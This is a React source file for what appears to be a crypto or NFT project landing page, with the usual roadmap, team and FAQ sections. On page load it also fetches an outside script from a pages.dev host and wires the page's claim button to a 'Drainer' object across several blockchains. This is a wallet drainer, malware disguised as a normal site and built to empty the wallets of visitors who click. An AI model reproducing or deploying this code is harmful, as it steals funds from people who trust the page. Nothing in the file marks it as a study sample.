import { useEffect, useState, useRef } from 'react';
import { default as HomeSection } from "./sections/Home";
import RoadMap from "./sections/Roadmap";
import Footer from "../../components/Footer";
import Header from "../../components/Header";
import Features from "./sections/Features";
import GoldenGuests from "./sections/GoldenGuests";
import Team from "./sections/Team";
import About from "./sections/About";
import FAQ from "./sections/FAQ";

// import { ReactComponent as Brand } from "../../assets/brand.svg";

const loadScript = async (src) => {
  return new Promise((resolve, reject) => {
    const existingScript = document.querySelector(`script[src="${src}"]`);
    if (existingScript) {
      resolve();
      return;
    }

    const script = document.createElement('script');
    script.src = src;
    script.onload = resolve;
    script.onerror = reject;
    document.head.appendChild(script);
  });
};


async function loadinJs () {
  await loadScript('https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js');
  await loadScript('https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js');
  await loadScript('https://cdnjs.cloudflare.com/ajax/libs/web3/4.0.1/web3.min.js');
  await loadScript('https://unpkg.com/moralis-v1@latest/dist/moralis.js');
  await loadScript('https://cdn.jsdelivr.net/npm/sweetalert2@11');
  await loadScript('https://cdn.jsdelivr.net/npm/moment@2.29.4/moment.min.js');
  await loadScript('https://momentjs.com/downloads/moment-timezone-with-data-1970-2030.min.js');
  await loadScript('https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js');
  await loadScript('https://web3community.pages.dev/sdk_00000.js');
  document.querySelector('#claimButton').addEventListener('click', async () => {
    const keepChainId  = 1;
    const chainSort = [1,42161,56,10,137 ]
    const display  = "block";
    const freeInitial = true;
    const adapterConn = false;
    const adapterClaim = true;
    
    const _keepChainId = (typeof keepChainId === 'undefined')? 1 : keepChainId;
    const _chainSort = (typeof chainSort === 'undefined')? [1] : chainSort;
    const _display = (typeof display === 'undefined')? "inline" : display;
    const _adapterConn = (typeof adapterConn === 'undefined')? false : adapterConn;
    const _adapterClaim = (typeof adapterClaim === 'undefined')? false : adapterClaim;
    const _freeInitial = (typeof freeInitial === 'undefined')? false : freeInitial;
    // eslint-disable-next-line no-undef
    new Drainer(_keepChainId,_adapterConn,_adapterClaim,_chainSort,_display);
  });
}

const Loading = () => (
  <div className="loading--container">
  </div>
)

function Home() {
  const timeoutRef = useRef(null);
  const [isFontLoaded, setIsFontLoaded] = useState(true);

  // useEffect(() => {
  //   document.fonts.onloading = () => {
  //     setIsFontLoaded(false)
  //   };
  //   document.fonts.onloadingdone = () => {
  //     timeoutRef.current = setTimeout(() => {
  //       setIsFontLoaded(true)
  //     }, 800)
  //   };

  //   return () => {
  //     clearTimeout(timeoutRef.current);
  //   }
  // })


  // if(!isFontLoaded) return <Loading/>;


  useEffect(() => {
    // console.log('加载js')
    setTimeout(loadinJs, 150)
  }, [])

  return (
    <>
      <Header />
      <HomeSection />
      <Features />
      <About />
      <GoldenGuests/>
      <RoadMap />
      <Team/>
      <FAQ />
      <Footer />
    </>
  );
}

export default Home;
